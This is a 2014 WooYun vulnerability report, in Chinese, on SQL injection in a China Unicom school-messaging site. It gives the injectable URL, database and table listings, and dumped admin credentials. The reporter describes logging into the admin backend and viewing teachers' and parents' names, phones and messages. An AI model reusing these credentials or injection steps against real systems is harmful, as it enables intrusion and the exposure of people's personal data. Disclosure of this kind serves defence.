当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061652

漏洞标题:中国联通某站SQL注入致用户信息泄漏

相关厂商:中国联通

漏洞作者: PythonPig

提交时间:2014-05-21 10:54

修复时间:2014-05-26 10:55

公开时间:2014-05-26 10:55

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-21: 细节已通知厂商并且等待厂商处理中
2014-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国联通某站存在sql注入,进入后台看了看,没有干坏事,有个上传点,不过我没有测试~~
听说联通的漏洞给的rank都不高~~这是为什么勒~?

详细说明:

有不少教师包括校长的信息,妈妈再也不用担心我的学习了~
每天管理员、教师通过这个平台发不少短信呢~~
0x01:这里是注入点,没有没其他点了,估计注入点少不了:http://jxt.yb10010.com/Public/ShowDetail.aspx?LB=2&ID=267,ID存在注入

1.png


0x02:数据库

available databases [6]:
[*] jxt
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


0x03:jxt中的表:

Database: jxt                                                                                      
[122 tables]
+-------------------------+
| dbo.A_D_dlshang         |
| dbo.A_S_Khwda           |
| dbo.A_S_cdan            |
| dbo.A_S_config          |
| dbo.A_S_jse             |
| dbo.A_S_qxian           |
| dbo.A_S_zhu             |
| dbo.A_W_Kjian           |
| dbo.A_W_lmu             |
| dbo.A_W_xwen            |
| dbo.A_W_zliao           |
| dbo.A_W_zllbie          |
| dbo.Admin               |
| dbo.Article             |
| dbo.BigClass            |
| dbo.D99_CMD             |
| dbo.FourClass           |
| dbo.GetPwd              |
| dbo.I_fblbie            |
| dbo.I_fbxxi             |
| dbo.I_fbxxi1            |
| dbo.I_fbxxiLog          |
| dbo.I_fkxxi             |
| dbo.I_jsfkxxi           |
| dbo.I_kqxxi             |
| dbo.I_schoolPyu         |
| dbo.I_xspyu             |
| dbo.KQStatus            |
| dbo.K_kqxxi             |
| dbo.Log                 |
| dbo.MmsGet              |
| dbo.MmsSEND             |
| dbo.MobileGet           |
| dbo.MobileSend          |
| dbo.MobileSendLog       |
| dbo.N_Dzjtiao           |
| dbo.N_Fdszhi            |
| dbo.N_JSKQGX_Jlu        |
| dbo.N_JSKQGX_Szhi       |
| dbo.N_JSKQ_Card         |
| dbo.N_JSKQ_Jlu          |
| dbo.N_JSKQ_Szhi         |
| dbo.N_KqJlu             |
| dbo.N_KqJlu2            |
| dbo.N_KqLmu             |
| dbo.N_Kqszhi            |
| dbo.N_KsNoTji           |
| dbo.N_XsCard            |
| dbo.N_XsCard_History    |
| dbo.O_grswu             |
| dbo.O_kcbiao            |
| dbo.O_xxckan            |
| dbo.O_xxswu             |
| dbo.ParBigClass         |
| dbo.ParSmallClass       |
| dbo.ParThirdClass       |
| dbo.ParamList           |
| dbo.SP_provider         |
| dbo.S_Advice            |
| dbo.S_BjJshi            |
| dbo.S_Jses              |
| dbo.S_Lmu               |
| dbo.S_bji               |
| dbo.S_cdan              |
| dbo.S_config            |
| dbo.S_jse               |
| dbo.S_kmu               |
| dbo.S_nji               |
| dbo.S_qxian             |
| dbo.S_xxjgou            |
| dbo.S_yfjbxxi           |
| dbo.S_zdyljie           |
| dbo.S_zhu               |
| dbo.S_ztai              |
| dbo.SendLog             |
| dbo.Send_Sms_S_Zhu      |
| dbo.Send_Sms_U_zhu      |
| dbo.Send_Sms_U_zhu_back |
| dbo.SmallClass          |
| dbo.T_cjpming           |
| dbo.T_cjxxi             |
| dbo.T_fzszhi            |
| dbo.T_kongzhiqipeizhi   |
| dbo.T_ksxxi             |
| dbo.T_kszhi             |
| dbo.T_xqszhi            |
| dbo.ThirdClass          |
| dbo.U_bjsquan           |
| dbo.U_jbxxi             |
| dbo.U_jcxxi             |
| dbo.U_studentGroup      |
| dbo.U_xsjzhang          |
| dbo.U_zhlbie            |
| dbo.U_zhu               |
| dbo.V_black             |
| dbo.V_jiegua            |
| dbo.V_teacher           |
| dbo.V_white             |
| dbo.View_Card_Student   |
| dbo.View_Card_Teacher   |
| dbo.View_NoCard_Student |
| dbo.View_NoCard_Teacher |
| dbo.VisitRecord         |
| dbo.department          |
| dbo.dtproperties        |
| dbo.everyDay            |
| dbo.everyMonth          |
| dbo.kqDuanXin           |
| dbo.messageGroup        |
| dbo.mobilesendV         |
| dbo.mood                |
| dbo.s_schoolMsg         |
| dbo.s_schoolMsgType     |
| dbo.select_check_sms    |
| dbo.select_users        |
| dbo.sysconstraints      |
| dbo.syssegments         |
| dbo.test                |
| dbo.tongji_LB           |
| dbo.v                   |
| dbo.view_chengji        |
| dbo.view_smsBodyPart    |
+-------------------------+


0x04:找了几个可能有admin的表跑了一下:

Database: jxt
Table: dbo.admin
[1 entry]
+----+----------+------------------+------------------+
| ID | UserName | Password         | RndPassword      |
+----+----------+------------------+------------------+
| 13 | admin    | 7a57a5a743894a0e | r84y6115O3q4tQFJ |
+----+----------+------------------+------------------+

Database: jxt
Table: dbo.A_S_zhu
[1 entry]
+-------+-------+-----------+--------+
| Js_ID | zh_ID | mma       | Zhming |
+-------+-------+-----------+--------+
| 1     | 1     | ybltadmin | admin  |
+-------+-------+-----------+--------+


0x05:后台地址:http://jxt.yb10010.com/Public/JxtLoginS.aspx
进去看看,结果看到了很多教师,家长的姓名、电话、短信内容……还有个可以上传的地方,不过我没有测试,家长信息

.jpg

教师信息

.jpg


漏洞证明:

同上

修复方案:

过滤
信息泄漏无小事,希望认真对待~~

版权声明:转载请注明来源 PythonPig@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-26 10:55

厂商回复:

最新状态:

2014-05-26:CNVD确认并复现所述情况,转由CNCERT协调中国联合网络通信集团有限公司通报处置。